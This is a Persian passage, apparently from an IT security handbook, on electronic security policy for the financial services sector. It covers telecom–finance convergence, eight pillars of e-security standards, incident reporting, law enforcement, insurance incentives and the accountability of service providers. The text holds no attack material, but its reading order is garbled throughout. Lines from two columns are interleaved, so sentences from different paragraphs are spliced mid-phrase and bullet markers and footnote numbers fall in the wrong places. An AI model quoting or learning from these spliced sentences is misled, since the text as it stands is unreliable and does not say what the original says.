ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﻻﺯﻣﺔ ﺭﻓـﺎﻩ ،ﺁﺳـﺎﻳﺶ ﻭ ﺳـﻼﻣﺖ
ﻣﻲﻛﻨﻨﺪ.
ﻋﻤﻮﻣﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪ ﻭ ﺍﺯ ﺍﻳﻨﺮﻭ ﻳﻚ ﺟـﺰﺀ ﺍﺻـﻠﻲ ﺿـﻮﺍﺑﻂ
ﺁﻥ ،ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﺑﻪ ﻣﻨﻈﻮﺭ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻡ ﺑﻮﺩ .ﺍﻣـﺎ ﺩﺭﺣـﺎﻝ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻋﻼﻭﻩ ﺑﺮ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺠﻢ ﻗﺎﺑﻞ
ﺣﺎﺿـﺮ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺧـﺪﻣﺎﺕ ﺍﻭﻟﻴــﺔ ﺗﻮﺟﻬﻲ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻓﻲﻣﺎﺑﻴﻦ ﻋﺮﺿـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻳﻚ ﺿﺮﻭﺭﺕ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ. ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨـﺪ .ﺍﻳـﻦ
ﺷﺮﻛﺘﻬﺎ ﺷﺎﻣﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥISP ،٣٠ﻫـﺎ ﻭ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ
ﺍﺯ ﻟﺤﺎﻅ ﺗﺎﺭﻳﺨﻲ ،ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﻣﻨﻄـﻖ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻫﺴﺘﻨﺪ .ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺟﺪﻳـﺪ
ﺿﺎﺑﻄﻪﻣﻨﺪ ﺷﺪﻩ ﻛﻪ ﺩﺭ ﻧﻘـﻞ ﻭ ﺍﻧﺘﻘـﺎﻻﺕ ﻣـﻨﻈﻢ ﻛـﺎﻻ ﻭ ﭘـﻮﻝ،
ﻻ ﺑﻌﻨـﻮﺍﻥ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﻛﻠﻴـﺪﻱ ﺧـﺪﻣﺎﺕ ﻛﻮﺗـﺎﻩﻣـﻮﺝ، ﻣﻌﻤﻮ ﹰ
ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﺎﻻﺗﺮﻳﻦ ﻣﻴﺰﺍﻥ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ؛ ﻭ
ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻓﻌﺎﻟﻴﺖ ﺩﺍﺭﻧﺪ .ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨﺪ ﺍﻋﺘﻤﺎﺩ ﻣﺮﺩﻡ ﻫـﺴﺘﻨﺪ،
ﺧﺪﻣﺎﺕ ﻣﻴﺰﺑﺎﻧﻲ ،ﺧﺪﻣﺎﺕ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﻭ ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺧﺪﻣﺎﺕ
ﺑﺎﻳﺪ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ﺳﺎﻟﻢ ،ﻣﻨﻄﻘﻲ ،ﻭ ﻣﺤﺘﺎﻃﺎﻧﻪ ﭘﻴﺶ ﺑﺒﺮﻧـﺪ .ﺑـﺎ
ﺯﻳﺮﺑﻨﺎﻳﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ.
ﻧﺰﺩﻳﻚﺷـﺪﻥ ﺻـﻨﻌﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﻭ ﺑﺨـﺶ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ
ﺑﺨﺶ ﺳﻮﻡ
ﻳﻜﺪﻳﮕﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ،ﺍﻫﻤﻴﺖ ﻭ ﺿﺮﻭﺭﺕ ﺍﻳﺠـﺎﺩ ﺳﻴﺎﺳـﺖ ﻣﺎﻟﻜﻴﺖ ﺻﻨﺎﻳﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻣـﻮﺭ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻋﻤﻮﻣﻲ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﮔﺎﻫﺎﻧﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺑﻴﺸﺘﺮ ﻣﻲﺷﻮﺩ ﺗﺎ ﺗﻀﻤﻴﻦ ﺑﺎﻋﺚ ﻃـﺮﺡ ﺳـﺆﺍﻻﺕ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺩﺭﺑـﺎﺭﺓ ﺳﻴﺎﺳـﺖ ﺭﻗـﺎﺑﺘﻲ ﻭ
ﻛﻨﺪ ﻛﻪ ﺩﻭﻟﺖ ،ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻣﺮﺩﻡ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺳـﺘﻔﺎﺩﺓ ﻛﺸﻤﻜﺸﻬﺎﻱ ﺑﺎﻟﻘﻮﻩ ﺑﺮﺍﻱ ﻛـﺴﺐ ﻣﻨـﺎﻓﻊ ﻣـﻲﺷـﻮﻧﺪ .ﺩﺭ ﻣـﻮﺭﺩ
ﺧﻮﺩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺍﻳﻤﻦ ﻣﺎﻟﻲ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ. ﺳﻴﺎﺳــﺖ ﺭﻗــﺎﺑﺘﻲ ﻣــﻲﺗــﻮﺍﻥ ﭘﺮﺳــﻴﺪ :ﺁﻳــﺎ ﻧﻘــﺸﻬﺎﻱ ﭼﻨﺪﮔﺎﻧــﺔ
ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺭﻗﺎﺑـﺖ ﺑـﻮﻳﮋﻩ ﺩﺭ
ﺩﺭ ﺗﻬﻴــﺔ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻋﻤــﻮﻣﻲ ﺑــﻪ ﻣﻨﻈــﻮﺭ ﺍﻳﺠــﺎﺩ ﻳــﺎ ﺍﺻــﻼﺡ
ﻻ ﺑﺮﺍﻱ ﺍﺭﺍﺋـﻪ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ، ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ -ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﻪ ﻫﺸﺖ ﺭﻛـﻦ ﻣﻬـﻢ ﺗﻮﺟـﻪ
ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺩ ﺩﺍﺭﻧﺪ -ﻣﻨﺠﺮ ﺷﻮﺩ؟ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ
ﺩﺍﺷﺖ:
ﻳﻜﭙﺎﺭﭼﮕﻲ ﺧـﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺷـﺮﻛﺖ ﺩﺭﺑـﺎﺭﺓ
ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ ﻣﻨﺎﺳﺐ؛ • ﮔــﺰﺍﺭﺵ ﺩﻗﻴــﻖ ﻭ ﻓــﻮﺭﻱ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﭼﮕﻮﻧــﻪ ﺗــﻀﻤﻴﻦ
ﺗﻤﻬﻴــﺪﺍﺕ ﻓﻨــﻲ ﻭ ﻣــﺪﻳﺮﻳﺘﻲ ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ • ﻣﻲﺷﻮﺩ؟ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﺭﻭﻧﺪ ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣـﻮﺭ ﺑـﻪ ﻳـﻚ ﺷـﺮﻛﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ؛ ﺛﺎﻟﺚ ،ﺍﻫﻤﻴﺖ ﺍﺻﻼﺡ ﺣﻮﺯﺓ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﺯ ﺭﺃﺱ ﻫﺮﻡ ﻣـﺴﺌﻮﻟﻴﺖ
ﻧﻈﺎﺭﺕ ﻗﻮﻱ ﻭ ﭘﻴﺸﮕﻴﺮﻱ؛ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻬﺘـﺮ • ﺩﺭ ﺻﻨﻌﺘﻲ ﺑـﺎ ﭼﻨـﻴﻦ ﻣﺠﻤﻮﻋـﺔ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺭﺍ
ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﻭ ﻻﻳـﻪﺑﻨـﺪﻱﺷـﺪﺓ ﻻ ﺩﺭ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﻴﺎﻥ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﻭ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﻣــﺪﻳﺮﻳﺖ ﺧﻄــﺮ؛ ﺍﺯ ﺟﻤﻠــﻪ ﺍﻣﻨﻴــﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺑــﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺯ ﻗـﺴﻤﺘﻲ ﺍﺯ ﻫﺰﻳﻨـﺔ ﻗـﺮﺍﺭﺩﺍﺩ
ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ؛ ﺧﺪﻣﺎﺕ ﺑﻌﻨﻮﺍﻥ ﺿﻤﺎﻧﺖ ﻛﺎﺭﺁﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺣﺘـﻲ ﺑـﺎ
ﻲ ﺑﻴﻤـﻪ ﺑﺘﻮﺍﻧﻨـﺪ
ﭼﺎﺭﭼﻮﺑﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻ ﹺ • ﻲ ﻓﻌﺎﻟﻴـﺖﺍﻳﻦ ﻭﺟﻮﺩ ﻫﻢ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﻣـﺴﺌﻠﻪ ﻛـﺎﺭﺁﻳ ﹺ
ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻴﻤﻪ ﻛﻨﻨﺪ ﻭ ﺩﺭ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﭘﺮﺩﺍﺧﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ.
ﻛﻨﺎﺭ ﺁﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻳﻦ ﺣﻮﺯﻩ ﺭﺍ ﺑـﺎ ﺍﻳﺠـﺎﺩ ﺗﻌﻬـﺪﺍﺕ
ﻣﺎﻟﻲ ﺑﺎﺯﭘﺮﺩﺍﺧﺘﻬﺎ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ؛ ﻲ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ، ﺩﺭ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ
ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ؛ • ﻣﻨﺎﻓﻊ ﻋﻤﻮﻣﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ
ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ؛ • ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻭ
ﺁﻣﻮﺯﺵ ﺷﻬﺮﻭﻧﺪﺍﻥ ،ﻛﺎﺭﻛﻨﺎﻥ ،ﻭ ﻣﺪﻳﺮﻳﺖ ﺩﺭﺑﺎﺭﺓ ﻣـﺴﺎﺋﻞ • ﻣﺴﺎﺋﻠﻲ ﻧﻈﻴﺮ ﻫﺰﻳﻨﻪ ،ﻛﻴﻔﻴﺖ ﺧﺪﻣﺎﺕ ،ﻭ ﻧﻮﺁﻭﺭﻱ ﺑـﻪ
ﺍﻣﻨﻴﺘﻲ؛ ﻭ ﻳﻚ ﺗﻮﺍﺯﻥ ﻣﻌﻘـﻮﻝ ﺭﺳـﻴﺪ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺿـﻮﺍﺑﻂ ﻭ
ﻳﻚ ﺳﺎﺧﺘﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻻﻳﻪﺑﻨﺪﻱ ﺷﺪﻩ. •
30 Hosting Companies
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٣٠
ﺟﺮﻳــﺎﻥ ﺩﺍﺭﺩ ﺗــﺄﺛﻴﺮ ﺑــﺴﺰﺍﻳﻲ ﺑــﺮ ﺳﻴــﺴﺘﻢ ﭘﺮﺩﺍﺧــﺖ ﺟﻬــﺎﻧﻲ، ﻣﺠﺎﺯﺍﺕ ﭼﻨﻴﻦ ﺟﺮﺍﺋﻤﻲ ﺗﺸﻮﻳﻖ ﻧﻤﺎﻳﻨﺪ ﺗﺎ ﺧﻄﺮ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﭘﻮﻟﻲ ،ﻭ ﭘﻴﺶﺑﻴﻨﻴﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺍﺭﺩ. ﺍﺯ ﺟﺎﻧﺐ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ ﻛﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻧﻴـﺰ ﺳـﺮﺍﻳﺖ
ﻛﺮﺩﻩ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻨﺪ.
ﺍﻟﺰﺍﻣﺎﺕ ﮔﺰﺍﺭﺵﺩﻫﻲ
ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ
ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺍﻣﻨﻴﺘﻲ ﺑﻮﻳﮋﻩ ﺩﺭ ﺣﻮﺯﺓ ﺧﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻲ ﻭ ﭘﻴـﺸﮕﻴﺮﻳﻬﺎﻱ ﻻﺯﻡ ﺷﺎﻳﺪ ﺑﺘﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﺍﺣﺘﻤﺎﻝ ﺗﺪﺍﻭﻡ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣﺮﺯﻫﺎﻱ ﻳﻚ ﻛﺸﻮﺭ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻭﺟﻮﺩ ﭼﺎﺭﭼﻮﺏ ﻗـﺎﻧﻮﻧﻲ ﺁﻥ ﺍﺯ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻧﺎﻣﻄﻤﺌﻦ ﻭ ﻧﺎﺩﺭﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧـﺴﺎﺭﺍﺕ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﻣﺒﺪﺃ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ،
ﺑﻴﺸﺘﺮ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ .ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﻣﻲﺗﻮﻧﺪ ﺍﻳـﻦ ﺑﺎﺷـﺪ ﻛـﻪ ﻛﺸﻮﺭﻫﺎﻳﻲ ﺑﻮﺩﻩﺍﻧﺪ ﻛﻪ ﻧﻈﺎﻡ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳـﻲ ﺿـﻌﻴﻔﻲ ﺑـﺮﺍﻱ
ﻭﻇﻴﻔﺔ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺑﺮ ﻋﻬﺪﺓ ﻣﺄﻣﻮﺭﺍﻥ ﺍﺟﺮﺍﻳﻲ ﮔـﺬﺍﺭﺩﻩ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺍﺷـﺘﻪﺍﻧـﺪ ﻭ ﻫﻤـﻴﻦ ﺍﻣـﺮ ﺿـﺮﻭﺭﺕ ﻭﺟـﻮﺩ
٣٦
ﺷﻮﺩ. ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺭﺍ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ
ﻧﻤﺎﻳﺎﻥ ﻣﻲﻛﻨﺪ.
ﭘﻴﺸﮕﺎﻣﺎﻥ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ
ﺵ ﻧﻈﺎﺭﺕ ﻭ ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ ﻲ ﮔﺴﺘﺮ ﹺ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﭼﮕﻮﻧﮕ ﹺ ﺭﻛﻦ ﺩﻭﻡ:
ﺑﺨﺶ ﺳﻮﻡ
ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺩﺭ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﻣﻲﺩﺍﺭﺩ ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ،ﺍﻧﺘﻘﺎﻝ ﻳﺎ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ
ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩﺍﻧـﺪ )ﻣﺜـﻞ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﻳـﺎ ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ( ﻏﻴﺮﻣﺠـــﺎﺯ ،ﺣـــﺴﺎﺱ ﻳـــﺎ ﻣﺤﺮﻣﺎﻧـــﻪ ﻧﺒﺎﻳـــﺪ ﺑﻜـــﺎﺭ ﺭﻭﺩ ﻭ ﺩﺭ
ﺗﺮﻏﻴﺐ ﻳـﺎ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺻـﻨﻌﺖ ﺑﻴﻤـﺔ ﺑﺨـﺶ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻫﻴﭻ ﻣﺴﺌﻮﻟﻴﺘﻲ ﻣﺘﻮﺟـﻪ ﭘﺪﻳﺪﺁﻭﺭﻧـﺪﺓ ﺁﻥ ﻧﺨﻮﺍﻫـﺪ
ﺧﺼﻮﺻﻲ ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻓﻌﺎﻟﺘﺮ ﺷﺪﻩ ،ﺍﻳﻦ ﺭﻭﺵ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ ﺑﻮﺩ.
ﻋﻤﻠﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﻪ ﺳـﻼﻣﺖ ﻋﻤـﻮﻣﻲ ﺻـﻨﻌﺖ
٤٠
ﺑﻴﻤﻪ ﻭ ﺳﺎﺧﺘﺎﺭ ﺁﻥ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﻨﺠﺮ ﺷﻮﺩ. ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ
ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺴﺒﺖ
ﻣﺴﺌﻮﻟﻴﺖ
ﺑﻪ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﺍﻳـﻦ ﺻـﻨﻌﺖ ﺩﺭ
ﭼﺎﺭﭼﻮﺏ ﺣﻘـﻮﻗﻲ ﻭ ﻗـﺎﻧﻮﻧﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻧﻴﺴﺘﻨﺪ ،ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺴﺘﺤﻜﻢﺗﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺑـﺎﺭ
ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ ،ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﺮﻧﺎﻣﻪﻫـﺎ ،ﻧـﺮﻡﺍﻓـﺰﺍﺭ، ﺩﻳﮕﺮ ﺗﺄﻛﻴﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻢ ﻫﻨﻮﺯ ﺭﺍﻩ ﺯﻳﺎﺩﻱ ﺗـﺎ
ﺳﺨﺖﺍﻓﺰﺍﺭ ﻭ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﺠﺎﺩ ﻛﻨـﺪ ﺗـﺎ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﻤﺎﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﭘﺎﺳﺨﮕﻮ ﺑﺎﺷﻨﺪ.
ﺭﻛﻦ ﺳﻮﻡ:
ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﺁﺯﻣﻮﻥ
ﭼﺎﻟﺸﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ
ﻛﻤﻴﺘﺔ ﺑﺎﺳﻞ ﺩﺭ ﮔﺮﻭﻩ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ) (EGBﻣﺆﺳـﺴﺔ
ﻋــﻼﻭﻩ ﺑــﺮ ﻛﻨﺘــﺮﻝ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧــﺖ ﻭ ﻧﻈــﺎﺭﺕ ﺑــﺮ
ﻧﻈﺎﺭﺕ ﺑﺎﻧﻜﻲ ٤١ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺭ ﺯﻣﻴﻨـﻪ ﺍﻓـﺰﺍﻳﺶ ،ﺍﻳﺠـﺎﺩ
ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﮔﺎﻥ ﭘﻮﻝ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺻﻼﺡ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻗـﺎﻧﻮﻧﻲ،
